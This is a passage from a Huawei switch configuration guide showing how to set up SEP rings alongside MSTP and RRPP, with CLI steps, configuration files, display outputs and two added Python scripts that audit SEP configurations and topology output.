a. Configure SEP segment 1 on LSW1 to LSW3 and configure VLAN 10 as the
control VLAN of SEP segment 1.
b. Add LSW1 to LSW3 to SEP segment 1 and configure interface roles on edge
devices (LSW1 and LSW2) of the SEP segment.
NOTE

PE1 and PE2 do not support the SEP protocol; therefore, the interfaces of LSW1 and LSW2
connected to the PEs must be no-neighbor edge interfaces.
c. On the device where the no-neighbor primary edge interface is located, specify the
interface in the middle of the SEP segment as the interface to block.
d. Configure manual preemption.
e. Configure the topology change notification function so that the upper-layer network
running MSTP can be notified of topology changes in the SEP segment.
2. Configure basic MSTP functions.
a. Add PE1 to PE4, LSW1, and LSW2 to the MST region RG1.
b. Create VLANs on PE1 to PE4, LSW1, and LSW2 and add interfaces on the STP
ring to the VLANs.
c. Configure PE3 as the root bridge and PE4 as the secondary root bridge.
3. Configure Layer 2 forwarding on the CE and LSW1 to LSW3.
NOTE

PE1 and PE2 are aggregation switches, PE3 is the root bridge, PE4 is the secondary root bridge, LSWs are
access switches, and CEs are user-side switches.

Procedure
Step 1 Configure basic SEP functions.
1. Configure SEP segment 1 on LSW1 to LSW3 and configure VLAN 10 as the control
VLAN of SEP segment 1.
# Configure LSW1.
<HUAWEI> system-view
[HUAWEI] sysname LSW1
[LSW1] sep segment 1 //Create SEP segment 1.
[LSW1-sep-segment1] control-vlan 10 //Configure VLAN 10 as the control VLAN of SEP segment 1.
[LSW1-sep-segment1] protected-instance all //Configure all protected instances of SEP segment 1.
[LSW1-sep-segment1] quit

# Configure LSW2.
<HUAWEI> system-view
[HUAWEI] sysname LSW2
[LSW2] sep segment 1 //Create SEP segment 1.
[LSW2-sep-segment1] control-vlan 10 //Configure VLAN 10 as the control VLAN of SEP segment 1.
[LSW2-sep-segment1] protected-instance all //Configure all protected instances of SEP segment 1.
[LSW2-sep-segment1] quit

# Configure LSW3.
<HUAWEI> system-view
[HUAWEI] sysname LSW3
[LSW3] sep segment 1 //Create SEP segment 1.
[LSW3-sep-segment1] control-vlan 10 //Configure VLAN 10 as the control VLAN of SEP segment 1.
[LSW3-sep-segment1] protected-instance all //Configure all protected instances of SEP segment 1.
[LSW3-sep-segment1] quit

NOTE

– The control VLAN must be a VLAN that has not been created or used, but the command for
creating a common VLAN is automatically displayed in the configuration file after the control
VLAN is created.
– Each SEP segment must have a control VLAN. After an interface is added to an SEP segment that
has a control VLAN, the interface is automatically added to the control VLAN.
2. Add LSW1 to LSW3 to SEP segment 1 and configure interface roles.

NOTE

By default, STP is enabled on Layer 2 interfaces. Before adding an interface to an SEP segment, disable
STP on the interface.
# Configure LSW1.
[LSW1] interface gigabitethernet 1/0/1
[LSW1-GigabitEthernet1/0/1] port link-type hybrid
[LSW1-GigabitEthernet1/0/1] sep segment 1 edge no-neighbor primary //Configure the interface as the no-neighbor primary edge interface and add it to SEP segment 1.
[LSW1-GigabitEthernet1/0/1] quit
[LSW1] interface gigabitethernet 1/0/2
[LSW1-GigabitEthernet1/0/2] port link-type hybrid
[LSW1-GigabitEthernet1/0/2] stp disable //Disable STP.
[LSW1-GigabitEthernet1/0/2] sep segment 1 //Add the interface to SEP segment 1.
[LSW1-GigabitEthernet1/0/2] quit

# Configure LSW2.
[LSW2] interface gigabitethernet 1/0/1
[LSW2-GigabitEthernet1/0/1] port link-type hybrid
[LSW2-GigabitEthernet1/0/1] sep segment 1 edge no-neighbor secondary //Configure the interface as the no-neighbor secondary edge interface and add it to SEP segment 1.
[LSW2-GigabitEthernet1/0/1] quit
[LSW2] interface gigabitethernet 1/0/2
[LSW2-GigabitEthernet1/0/2] port link-type hybrid
[LSW2-GigabitEthernet1/0/2] stp disable //Disable STP.
[LSW2-GigabitEthernet1/0/2] sep segment 1 //Add the interface to SEP segment 1.
[LSW2-GigabitEthernet1/0/2] quit

# Configure LSW3.
[LSW3] interface gigabitethernet 1/0/1
[LSW3-GigabitEthernet1/0/1] port link-type hybrid
[LSW3-GigabitEthernet1/0/1] stp disable //Disable STP.
[LSW3-GigabitEthernet1/0/1] sep segment 1 //Add the interface to SEP segment 1.
[LSW3-GigabitEthernet1/0/1] quit
[LSW3] interface gigabitethernet 1/0/2
[LSW3-GigabitEthernet1/0/2] port link-type hybrid
[LSW3-GigabitEthernet1/0/2] stp disable //Disable STP.
[LSW3-GigabitEthernet1/0/2] sep segment 1 //Add the interface to SEP segment 1.
[LSW3-GigabitEthernet1/0/2] quit

3. Specify a blocking interface.


# In SEP segment 1, set the blocking mode on LSW1 (the device where the no-neighbor primary edge interface is located) so that the interface in the middle of the SEP segment is blocked.
[LSW1] sep segment 1
[LSW1-sep-segment1] block port middle

4. Configure a preemption mode.


# Configure manual preemption on LSW1.
[LSW1-sep-segment1] preempt manual

5. Configure the SEP topology change notification function.


Configure devices in SEP segment 1 to notify the MSTP network of topology changes.
# Configure LSW1.
[LSW1-sep-segment1] tc-notify stp
[LSW1-sep-segment1] quit

# Configure LSW2.
[LSW2] sep segment 1
[LSW2-sep-segment1] tc-notify stp
[LSW2-sep-segment1] quit
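The two NOTEs in this step (the control VLAN must be a VLAN that is not otherwise used, and STP must be disabled on an interface before it joins the SEP segment) are easy to miss when the same commands are repeated on several switches. The following Python script is an added illustration, not Huawei code: it parses a configuration file in the format used in the Configuration Files section of this example and reports interfaces that joined a SEP segment with STP still enabled, interfaces outside the segment that carry a segment's control VLAN, and references to a segment that was never created. The sample configuration is constructed for this example (based on LSW3, with two mistakes inserted on purpose). Exempting no-neighbor edge interfaces from the STP rule mirrors LSW1 and LSW2 in this example, where GE1/0/1 keeps STP enabled toward the MSTP network; treating that as the general rule is an assumption of this script.

```python
import re

# Constructed sample in the style of this section's configuration files.
# Two deliberate mistakes: GE1/0/2 joins the segment without "stp disable",
# and GE1/0/3 (not in the segment) carries control VLAN 10 as a service VLAN.
SAMPLE_CONFIG = """\
#
sysname LSW3
#
vlan batch 10 100
#
sep segment 1
 control-vlan 10
 protected-instance 0 to 4094
#
interface GigabitEthernet1/0/1
 port link-type hybrid
 port hybrid tagged vlan 10 100
 stp disable
 sep segment 1
#
interface GigabitEthernet1/0/2
 port link-type hybrid
 port hybrid tagged vlan 10 100
 sep segment 1
#
interface GigabitEthernet1/0/3
 port link-type hybrid
 port hybrid tagged vlan 10 100
#
return
"""

# A VLAN list as written in VRP: "10 100", "5 6 100", "10 to 20 100".
VLAN_LIST = r"(\d+(?: to \d+)?(?: \d+(?: to \d+)?)*)"
SEP_PORT = r"sep segment (\d+)(?: edge( no-neighbor)? (?:primary|secondary))?"
VLAN_MEMBER = r"port (?:hybrid tagged|hybrid untagged|trunk allow-pass) vlan " + VLAN_LIST


def expand_vlans(spec):
    """'10 100' -> {10, 100}; '5 to 7 100' -> {5, 6, 7, 100}."""
    vlans, tokens, i = set(), spec.split(), 0
    while i < len(tokens):
        if i + 2 < len(tokens) and tokens[i + 1] == "to":
            vlans.update(range(int(tokens[i]), int(tokens[i + 2]) + 1))
            i += 3
        else:
            vlans.add(int(tokens[i]))
            i += 1
    return vlans


def parse_blocks(text):
    """Split a VRP configuration into '#'-delimited blocks of stripped lines."""
    blocks, current = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "#":
            if current:
                blocks.append(current)
            current = []
        elif line and line != "return":
            current.append(line)
    if current:
        blocks.append(current)
    return blocks


def audit_sep_config(text):
    """Return (interface, message) findings for the SEP rules described above."""
    blocks = parse_blocks(text)
    control_vlans = {}  # segment id -> control VLAN
    for block in blocks:
        m = re.fullmatch(r"sep segment (\d+)", block[0])
        if m:
            for line in block[1:]:
                cm = re.fullmatch(r"control-vlan (\d+)", line)
                if cm:
                    control_vlans[int(m.group(1))] = int(cm.group(1))
    findings = []
    for block in blocks:
        if not block[0].startswith("interface "):
            continue
        name, body = block[0].split(" ", 1)[1], block[1:]
        segments, no_neighbor_edge, carried = set(), False, set()
        for line in body:
            sm = re.fullmatch(SEP_PORT, line)
            if sm:
                segments.add(int(sm.group(1)))
                no_neighbor_edge = no_neighbor_edge or sm.group(2) is not None
            vm = re.fullmatch(VLAN_MEMBER, line)
            if vm:
                carried |= expand_vlans(vm.group(1))
        for seg in sorted(segments - set(control_vlans)):
            findings.append((name, f"references undefined SEP segment {seg}"))
        # Rule from the NOTE: disable STP before adding the interface to the segment.
        if segments and not no_neighbor_edge and "stp disable" not in body:
            findings.append((name, "STP still enabled on a SEP ring interface"))
        # Rule from the NOTE: the control VLAN is dedicated to SEP, so a port
        # outside the segment should not carry it.
        if not segments:
            for seg, cvlan in sorted(control_vlans.items()):
                if cvlan in carried:
                    findings.append((name, f"carries SEP segment {seg} control VLAN {cvlan} but is not in the segment"))
    return findings


if __name__ == "__main__":
    for iface, msg in audit_sep_config(SAMPLE_CONFIG):
        print(f"{iface}: {msg}")
```

Run it against the saved configuration of each switch in the segment (`display current-configuration` output works as input); in the sample it flags GE1/0/2 and GE1/0/3 and is silent on GE1/0/1.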

Step 2 Configure basic MSTP functions.


1. Configure an MST region.
# Configure PE1.
<HUAWEI> system-view
[HUAWEI] sysname PE1
[PE1] stp region-configuration //Enter the MST region view.
[PE1-mst-region] region-name RG1 //Configure the MST region name as RG1.
[PE1-mst-region] active region-configuration //Activate the MST region configuration.
[PE1-mst-region] quit

# Configure PE2.
<HUAWEI> system-view
[HUAWEI] sysname PE2
[PE2] stp region-configuration //Enter the MST region view.
[PE2-mst-region] region-name RG1 //Configure the MST region name as RG1.
[PE2-mst-region] active region-configuration //Activate the MST region configuration.
[PE2-mst-region] quit

# Configure PE3.
<HUAWEI> system-view
[HUAWEI] sysname PE3
[PE3] stp region-configuration //Enter the MST region view.
[PE3-mst-region] region-name RG1 //Configure the MST region name as RG1.
[PE3-mst-region] active region-configuration //Activate the MST region configuration.
[PE3-mst-region] quit

# Configure PE4.
<HUAWEI> system-view
[HUAWEI] sysname PE4
[PE4] stp region-configuration //Enter the MST region view.
[PE4-mst-region] region-name RG1 //Configure the MST region name as RG1.
[PE4-mst-region] active region-configuration //Activate the MST region configuration.
[PE4-mst-region] quit

# Configure LSW1.
[LSW1] stp region-configuration //Enter the MST region view.
[LSW1-mst-region] region-name RG1 //Configure the MST region name as RG1.
[LSW1-mst-region] active region-configuration //Activate the MST region configuration.
[LSW1-mst-region] quit

# Configure LSW2.
[LSW2] stp region-configuration //Enter the MST region view.
[LSW2-mst-region] region-name RG1 //Configure the MST region name as RG1.
[LSW2-mst-region] active region-configuration //Activate the MST region configuration.
[LSW2-mst-region] quit

2. Create a VLAN and add interfaces on the ring network to the VLAN.
# On PE1, create VLAN 100 and add GE1/0/1, GE1/0/2, and GE1/0/3 to VLAN 100.
[PE1] vlan 100
[PE1-vlan100] quit
[PE1] interface gigabitethernet 1/0/1
[PE1-GigabitEthernet1/0/1] port link-type hybrid
[PE1-GigabitEthernet1/0/1] port hybrid tagged vlan 100
[PE1-GigabitEthernet1/0/1] quit
[PE1] interface gigabitethernet 1/0/2
[PE1-GigabitEthernet1/0/2] port link-type hybrid
[PE1-GigabitEthernet1/0/2] port hybrid tagged vlan 100
[PE1-GigabitEthernet1/0/2] quit
[PE1] interface gigabitethernet 1/0/3
[PE1-GigabitEthernet1/0/3] port link-type hybrid
[PE1-GigabitEthernet1/0/3] port hybrid tagged vlan 100
[PE1-GigabitEthernet1/0/3] quit

# On PE2, PE3, and PE4, create VLAN 100 and add GE1/0/1, GE1/0/2, and GE1/0/3 to
VLAN 100.
The configurations of PE2, PE3, and PE4 are similar to the configuration of PE1 and are
not shown here. For details, see the configuration files in this example.
On LSW1 and LSW2, create VLAN 100 and add GE1/0/1 to VLAN 100. The
configurations of LSW1 and LSW2 are similar to the configuration of PE1 and are not
shown here. For details, see the configuration files in this example.
3. Enable MSTP.
# Configure PE1.
[PE1] stp enable

# Configure PE2.
[PE2] stp enable

# Configure PE3.
[PE3] stp enable

# Configure PE4.
[PE4] stp enable

# Configure LSW1.
[LSW1] stp enable

# Configure LSW2.
[LSW2] stp enable

4. Configure PE3 as the root bridge and PE4 as the secondary root bridge.
# Set the priority of PE3 to 0 in MSTI 0 to ensure that PE3 functions as the root bridge.
[PE3] stp root primary

# Set the priority of PE4 to 4096 in MSTI 0 to ensure that PE4 functions as the
secondary root bridge.
[PE4] stp root secondary

Step 3 Configure the Layer 2 forwarding function on the CE and LSW1 to LSW3.

The configuration details are not mentioned here. For details, see configuration files in this
example.

Step 4 Verify the configuration.

After the configuration is complete and the network topology becomes stable, perform the
following operations to verify the configuration.

# Run the shutdown command on GE1/0/1 of LSW2 to simulate a fault, and then run the
display sep interface command on LSW3 to check whether GE1/0/2 on LSW3 changes from
the discarding state to the forwarding state.
<LSW3> display sep interface gigabitethernet 1/0/2
SEP segment 1
----------------------------------------------------------------
Interface Port Role Neighbor Status Port Status
----------------------------------------------------------------
GE1/0/2 common up forwarding

----End

Configuration Files
l Configuration file of LSW1
#
sysname LSW1
#
vlan batch 10 100
#
stp region-configuration
region-name RG1
active region-configuration
#
sep segment 1
control-vlan 10
block port middle
tc-notify stp
protected-instance 0 to 4094
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid tagged vlan 10 100
sep segment 1 edge no-neighbor primary
#
interface GigabitEthernet1/0/2
port link-type hybrid
port hybrid tagged vlan 10 100
stp disable
sep segment 1
#
return

l Configuration file of LSW2


#
sysname LSW2
#
vlan batch 10 100
#
stp region-configuration
region-name RG1
active region-configuration
#
sep segment 1
control-vlan 10
tc-notify stp
protected-instance 0 to 4094
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid tagged vlan 10 100
sep segment 1 edge no-neighbor secondary
#
interface GigabitEthernet1/0/2
port link-type hybrid
port hybrid tagged vlan 10 100
stp disable
sep segment 1
#
return

l Configuration file of LSW3


#
sysname LSW3
#
vlan batch 10 100
#
sep segment 1
control-vlan 10
protected-instance 0 to 4094
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid tagged vlan 10 100
stp disable
sep segment 1
#
interface GigabitEthernet1/0/2
port link-type hybrid
port hybrid tagged vlan 10 100
stp disable
sep segment 1
#
interface GigabitEthernet1/0/3
port link-type hybrid
port hybrid tagged vlan 100
#
return

l Configuration file of PE1


#
sysname PE1
#
vlan batch 100
#
stp region-configuration
region-name RG1
active region-configuration
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid tagged vlan 100
#
interface GigabitEthernet1/0/2
port link-type hybrid
port hybrid tagged vlan 100
#
interface GigabitEthernet1/0/3
port link-type hybrid
port hybrid tagged vlan 100
#
return

l Configuration file of PE2


#
sysname PE2
#
vlan batch 100
#
stp region-configuration
region-name RG1
active region-configuration
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid tagged vlan 100
#
interface GigabitEthernet1/0/2
port link-type hybrid
port hybrid tagged vlan 100
#
interface GigabitEthernet1/0/3
port link-type hybrid
port hybrid tagged vlan 100
#
return

l Configuration file of PE3


#
sysname PE3
#
vlan batch 100
#
stp instance 0 root primary
#
stp region-configuration
region-name RG1
active region-configuration
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid tagged vlan 100
#
interface GigabitEthernet1/0/2
port link-type hybrid
port hybrid tagged vlan 100
#
interface GigabitEthernet1/0/3
port link-type hybrid
port hybrid tagged vlan 100
#
return

l Configuration file of PE4


#
sysname PE4
#
vlan batch 100
#
stp instance 0 root secondary
#
stp region-configuration
region-name RG1
active region-configuration
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid tagged vlan 100
#
interface GigabitEthernet1/0/2
port link-type hybrid
port hybrid tagged vlan 100
#
interface GigabitEthernet1/0/3
port link-type hybrid
port hybrid tagged vlan 100
#
return

l Configuration file of the CE


#
sysname CE
#
vlan batch 100
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid tagged vlan 100
#
return


Related Content
Videos
Configuring SEP

7.9 Example for Configuring SEP and RRPP on a Network


Overview
Generally, redundant links are used to provide link backup and enhance network reliability.
The use of redundant links, however, may produce loops. Loops cause infinite looping of
packets. Consequently, broadcast storms occur and the MAC address table becomes unstable.
As a result, the communication quality deteriorates, and communication services may even be
interrupted. To block redundant links and ensure that the blocked links can be restored
immediately to resume communication when a link fault occurs on a ring network, you can
deploy SEP and RRPP on the ring network.

Configuration Notes
This example applies to all versions and products.

Networking Requirements
As shown in Figure 7-11, multiple Layer 2 switching devices at access and aggregation layers
constitute a ring network and connect to the core layer. The aggregation layer uses RRPP to
eliminate redundant links, and the access layer uses SEP.
l When there is no faulty link on the ring network, SEP can eliminate loops on the
Ethernet network.
l When a link fails on the ring network, SEP can fast restore communication between
nodes in the ring.
l The topology change notification function is configured on an edge device in a SEP
segment so that devices on the upper-layer network can detect topology changes on the
lower-layer network in a timely manner.
After receiving a topology change notification from a lower-layer network, a device on
an upper-layer network sends a TC packet to instruct other devices to delete original
MAC addresses and learn new MAC addresses. This ensures nonstop traffic forwarding.


Figure 7-11 SEP and RRPP networking

[Figure 7-11 is an image and is not reproduced here. Recoverable content: NPE1 and NPE2 sit in the upstream network above the aggregation layer. The aggregation layer runs RRPP on PE1, PE2, PE3 and PE4. SEP segment 1 spans PE1, LSW1, LSW3, LSW2 and PE2, with GE1/0/1 on PE1 as the primary edge port and GE1/0/1 on PE2 as the secondary edge port facing LSW1 and LSW2. The CE connects through its GE1/0/1 to GE1/0/3 on LSW3. The service VLAN is VLAN 100. Legend: Primary Edge Port, Secondary Edge Port, Block Port (SEP), Block Port (RRPP).]

Configuration Roadmap
The configuration roadmap is as follows:

1. Configure basic SEP functions.


a. Configure SEP segment 1 on PE1, PE2, and LSW1 to LSW3 and configure VLAN
10 as the control VLAN of SEP segment 1.
b. Add PE1, PE2, and LSW1 to LSW3 to SEP segment 1 and configure interface roles
on edge devices (PE1 and PE2) of the SEP segment.
c. On the device where the primary edge interface is located, specify the mode in
which an interface is blocked.
d. Configure a SEP preemption mode to ensure that the specified blocked interface
takes effect when the fault is rectified.
e. Configure the topology change notification function so that the upper-layer network
running RRPP can be notified of topology changes in the SEP segment.
2. Configure basic RRPP functions.


a. Add PE1 to PE4 to RRPP domain 1, configure VLAN 5 as the control VLAN on
PE1 to PE4, and configure the protected VLAN.
b. Configure PE1 as the master node and PE2 to PE4 as the transit nodes on the major
ring, and configure primary and secondary interfaces of the master node.
c. Create VLANs on PE1 to PE4 and add interfaces on the RRPP ring to the VLANs.
3. Configure Layer 2 forwarding on the CE, LSW1 to LSW3, and PE1 to PE4.
NOTE

PEs are aggregation switches, LSWs are access switches, and CEs are user-side switches.

Procedure
Step 1 Configure basic SEP functions.
1. Configure SEP segment 1 and configure VLAN 10 as the control VLAN of SEP segment
1.
# Configure PE1.
<HUAWEI> system-view
[HUAWEI] sysname PE1
[PE1] sep segment 1 //Create SEP segment 1.
[PE1-sep-segment1] control-vlan 10 //Configure VLAN 10 as the control VLAN of SEP segment 1.
[PE1-sep-segment1] protected-instance all //Configure all protected instances of SEP segment 1.
[PE1-sep-segment1] quit

# Configure PE2.
<HUAWEI> system-view
[HUAWEI] sysname PE2
[PE2] sep segment 1 //Create SEP segment 1.
[PE2-sep-segment1] control-vlan 10 //Configure VLAN 10 as the control VLAN of SEP segment 1.
[PE2-sep-segment1] protected-instance all //Configure all protected instances of SEP segment 1.
[PE2-sep-segment1] quit

# Configure LSW1.
<HUAWEI> system-view
[HUAWEI] sysname LSW1
[LSW1] sep segment 1 //Create SEP segment 1.
[LSW1-sep-segment1] control-vlan 10 //Configure VLAN 10 as the control VLAN of SEP segment 1.
[LSW1-sep-segment1] protected-instance all //Configure all protected instances of SEP segment 1.
[LSW1-sep-segment1] quit

# Configure LSW2.
<HUAWEI> system-view
[HUAWEI] sysname LSW2
[LSW2] sep segment 1 //Create SEP segment 1.
[LSW2-sep-segment1] control-vlan 10 //Configure VLAN 10 as the control VLAN of SEP segment 1.
[LSW2-sep-segment1] protected-instance all //Configure all protected instances of SEP segment 1.
[LSW2-sep-segment1] quit

# Configure LSW3.
<HUAWEI> system-view
[HUAWEI] sysname LSW3
[LSW3] sep segment 1 //Create SEP segment 1.
[LSW3-sep-segment1] control-vlan 10 //Configure VLAN 10 as the control VLAN of SEP segment 1.
[LSW3-sep-segment1] protected-instance all //Configure all protected instances of SEP segment 1.
[LSW3-sep-segment1] quit

NOTE

– The control VLAN must be a VLAN that has not been created or used, but the command for
creating a common VLAN is automatically displayed in the configuration file after the control
VLAN is created.
– Each SEP segment must have a control VLAN. After an interface is added to an SEP segment that
has a control VLAN, the interface is automatically added to the control VLAN.
2. Add PE1, PE2, and LSW1 to LSW3 to SEP segment 1 and configure interface roles.
NOTE

By default, STP is enabled on Layer 2 interfaces. Before adding an interface to an SEP segment,
disable STP on the interface.
# Configure PE1.
[PE1] interface gigabitethernet 1/0/1
[PE1-GigabitEthernet1/0/1] port link-type trunk
[PE1-GigabitEthernet1/0/1] stp disable //Disable STP.
[PE1-GigabitEthernet1/0/1] sep segment 1 edge primary //Configure the interface as the primary edge interface and add it to SEP segment 1.
[PE1-GigabitEthernet1/0/1] quit

# Configure LSW1.
[LSW1] interface gigabitethernet 1/0/1
[LSW1-GigabitEthernet1/0/1] port link-type trunk
[LSW1-GigabitEthernet1/0/1] stp disable //Disable STP.
[LSW1-GigabitEthernet1/0/1] sep segment 1 //Add the interface to SEP segment 1.
[LSW1-GigabitEthernet1/0/1] quit
[LSW1] interface gigabitethernet 1/0/2
[LSW1-GigabitEthernet1/0/2] port link-type trunk
[LSW1-GigabitEthernet1/0/2] stp disable //Disable STP.
[LSW1-GigabitEthernet1/0/2] sep segment 1 //Add the interface to SEP segment 1.
[LSW1-GigabitEthernet1/0/2] quit

# Configure LSW2.
[LSW2] interface gigabitethernet 1/0/1
[LSW2-GigabitEthernet1/0/1] port link-type trunk
[LSW2-GigabitEthernet1/0/1] stp disable //Disable STP.
[LSW2-GigabitEthernet1/0/1] sep segment 1 //Add the interface to SEP segment 1.
[LSW2-GigabitEthernet1/0/1] quit
[LSW2] interface gigabitethernet 1/0/2
[LSW2-GigabitEthernet1/0/2] port link-type trunk
[LSW2-GigabitEthernet1/0/2] stp disable //Disable STP.
[LSW2-GigabitEthernet1/0/2] sep segment 1 //Add the interface to SEP segment 1.
[LSW2-GigabitEthernet1/0/2] quit

# Configure LSW3.
[LSW3] interface gigabitethernet 1/0/1
[LSW3-GigabitEthernet1/0/1] port link-type trunk
[LSW3-GigabitEthernet1/0/1] stp disable //Disable STP.
[LSW3-GigabitEthernet1/0/1] sep segment 1 //Add the interface to SEP segment 1.
[LSW3-GigabitEthernet1/0/1] quit
[LSW3] interface gigabitethernet 1/0/2
[LSW3-GigabitEthernet1/0/2] port link-type trunk
[LSW3-GigabitEthernet1/0/2] stp disable //Disable STP.
[LSW3-GigabitEthernet1/0/2] sep segment 1 //Add the interface to SEP segment 1.
[LSW3-GigabitEthernet1/0/2] quit

# Configure PE2.
[PE2] interface gigabitethernet 1/0/1
[PE2-GigabitEthernet1/0/1] port link-type trunk
[PE2-GigabitEthernet1/0/1] stp disable //Disable STP.
[PE2-GigabitEthernet1/0/1] sep segment 1 edge secondary //Configure the interface as the secondary edge interface and add it to SEP segment 1.
[PE2-GigabitEthernet1/0/1] quit

After the configuration is complete, run the display sep topology command on PE1 to
check the topology of the SEP segment. The command output shows that the blocked
interface is one of the two interfaces on the link that last completes neighbor negotiation.
[PE1] display sep topology
SEP segment 1
-------------------------------------------------------------------------
System Name Port Name Port Role Port Status Hop
-------------------------------------------------------------------------
PE1 GE1/0/1 primary forwarding 1
LSW1 GE1/0/1 common forwarding 2
LSW1 GE1/0/2 common forwarding 3
LSW3 GE1/0/2 common forwarding 4
LSW3 GE1/0/1 common forwarding 5
LSW2 GE1/0/2 common forwarding 6
LSW2 GE1/0/1 common forwarding 7
PE2 GE1/0/1 secondary discarding 8

3. Specify a blocked interface.


# In SEP segment 1, set the mode of blocking an interface on PE1 where the primary
edge interface is located to block the interface in the middle of the SEP segment.
[PE1] sep segment 1
[PE1-sep-segment1] block port middle

4. Configure a preemption mode.


# In SEP segment 1, configure the manual preemption mode on PE1 where the primary
edge interface is located.
[PE1-sep-segment1] preempt manual

5. Configure the SEP topology change notification function.


Configure devices in SEP segment 1 to notify the RRPP network of topology changes.
# Configure PE1.
[PE1-sep-segment1] tc-notify rrpp
[PE1-sep-segment1] quit

# Configure PE2.
[PE2] sep segment 1
[PE2-sep-segment1] tc-notify rrpp
[PE2-sep-segment1] quit

After the configuration is complete, perform the following operations to verify the
configuration. PE1 is used as an example.
l Run the display sep topology command on PE1 to check the topology of the SEP
segment.
The command output shows that GE1/0/2 of LSW3 is in discarding state and other
interfaces are in forwarding state.
[PE1] display sep topology
SEP segment 1
-------------------------------------------------------------------------
System Name Port Name Port Role Port Status Hop
-------------------------------------------------------------------------
PE1 GE1/0/1 primary forwarding 1
LSW1 GE1/0/1 common forwarding 2
LSW1 GE1/0/2 common forwarding 3
LSW3 GE1/0/2 common discarding 4
LSW3 GE1/0/1 common forwarding 5
LSW2 GE1/0/2 common forwarding 6
LSW2 GE1/0/1 common forwarding 7
PE2 GE1/0/1 secondary forwarding 8

l Run the display sep interface verbose command on PE1 to check detailed information
about interfaces in the SEP segment.
[PE1] display sep interface verbose
SEP segment 1
Control-vlan :10
Preempt Delay Timer :0
TC-Notify Propagate to :rrpp
----------------------------------------------------------------
Interface :GE1/0/1
Port Role :Config = primary / Active = primary
Port Priority :64
Port Status :forwarding
Neighbor Status :up
Neighbor Port :LSW1 - GE1/0/1 (00e0-0829-7c00.0000)
NBR TLV rx :2124 tx :2126
LSP INFO TLV rx :2939 tx :135
LSP ACK TLV rx :113 tx :768
PREEMPT REQ TLV rx :0 tx :3
PREEMPT ACK TLV rx :3 tx :0
TC Notify rx :5 tx :3
EPA rx :363 tx :397
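The two display sep topology outputs in this step show the property a healthy SEP ring must have: hops numbered 1 to N without gaps, the primary edge port at hop 1, the secondary edge port at hop N, and exactly one port in the discarding state, which moved from the last-negotiated link to the middle link once block port middle took effect. The following Python script is an added illustration, not Huawei code: it parses that command output and checks those properties, and it maps the discarding port to the link it sits on. The sample input is the output copied from this step. Two points are assumptions of this script rather than statements from the page: that consecutive hops alternate between the two ends of a link (odd hop with the hop after it) and the two ports of one device, as the outputs here show, and that "middle" means hop N/2 rounded down, which matches the 8-port ring here.

```python
import re

# "display sep topology" output copied from this step, before "block port
# middle" (the last-negotiated link, PE2 GE1/0/1, is discarding).
TOPOLOGY_BEFORE = """\
SEP segment 1
-------------------------------------------------------------------------
System Name     Port Name       Port Role       Port Status     Hop
-------------------------------------------------------------------------
PE1             GE1/0/1         primary         forwarding      1
LSW1            GE1/0/1         common          forwarding      2
LSW1            GE1/0/2         common          forwarding      3
LSW3            GE1/0/2         common          forwarding      4
LSW3            GE1/0/1         common          forwarding      5
LSW2            GE1/0/2         common          forwarding      6
LSW2            GE1/0/1         common          forwarding      7
PE2             GE1/0/1         secondary       discarding      8
"""

# The same output after "block port middle": LSW3 GE1/0/2 discarding instead.
TOPOLOGY_AFTER = TOPOLOGY_BEFORE.replace(
    "LSW3            GE1/0/2         common          forwarding      4",
    "LSW3            GE1/0/2         common          discarding      4",
).replace(
    "PE2             GE1/0/1         secondary       discarding      8",
    "PE2             GE1/0/1         secondary       forwarding      8",
)


def parse_sep_topology(text):
    """Return (segment_id, entries) with one dict per port, sorted by hop."""
    segment, entries = None, []
    for line in text.splitlines():
        m = re.match(r"SEP segment (\d+)", line)
        if m:
            segment = int(m.group(1))
            continue
        parts = line.split()
        # Data rows have exactly five columns and end in the hop number.
        if len(parts) == 5 and parts[4].isdigit():
            entries.append({"system": parts[0], "port": parts[1], "role": parts[2],
                            "status": parts[3], "hop": int(parts[4])})
    entries.sort(key=lambda e: e["hop"])
    return segment, entries


def blocked_ports(entries):
    """(system, port, hop) for every port reported as discarding."""
    return [(e["system"], e["port"], e["hop"]) for e in entries if e["status"] == "discarding"]


def middle_hop(n):
    """Hop expected to be blocked by 'block port middle' (assumption: n // 2)."""
    return n // 2


def blocked_link(entries):
    """Both ends of the blocked link, ordered by hop, or None if not exactly one port is blocked.

    Assumption drawn from the output: an odd hop h is one end of a link whose
    other end is hop h+1; an even hop pairs with h-1 (hop 1 with 2, 3 with 4, ...).
    """
    blocked = blocked_ports(entries)
    if len(blocked) != 1:
        return None
    hop = blocked[0][2]
    partner = hop + 1 if hop % 2 else hop - 1
    by_hop = {e["hop"]: e for e in entries}
    if partner not in by_hop:
        return None
    a, b = by_hop[min(hop, partner)], by_hop[max(hop, partner)]
    return ((a["system"], a["port"]), (b["system"], b["port"]))


def check_ring(entries):
    """Problems that a fault-free, closed SEP ring must not show; empty list when healthy."""
    problems = []
    n = len(entries)
    if [e["hop"] for e in entries] != list(range(1, n + 1)):
        problems.append("hop numbers are not contiguous: a node or link dropped out of the segment")
    if n and entries[0]["role"] != "primary":
        problems.append("hop 1 is not the primary edge port")
    if n and entries[-1]["role"] != "secondary":
        problems.append(f"hop {n} is not the secondary edge port")
    blocked = blocked_ports(entries)
    if not blocked:
        problems.append("no discarding port: expected only while a ring link is down")
    elif len(blocked) > 1:
        problems.append(f"{len(blocked)} discarding ports: the ring is split")
    return problems


if __name__ == "__main__":
    for label, text in (("before block port middle", TOPOLOGY_BEFORE), ("after", TOPOLOGY_AFTER)):
        segment, entries = parse_sep_topology(text)
        print(label, "segment", segment, "blocked", blocked_ports(entries),
              "link", blocked_link(entries), "problems", check_ring(entries))
```

Feeding the output of each display sep topology run to check_ring turns the verification step into a yes/no answer, and blocked_link names the link that is actually open, which is what you want to confirm after changing the blocking mode or after a simulated fault.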

Step 2 Configure basic RRPP functions.


1. Add PE1 to PE4 to RRPP domain 1, configure VLAN 5 as the control VLAN on PE1 to
PE4, and configure the protected VLAN.
# Configure PE1.
[PE1] stp region-configuration //Enter the MST region view.
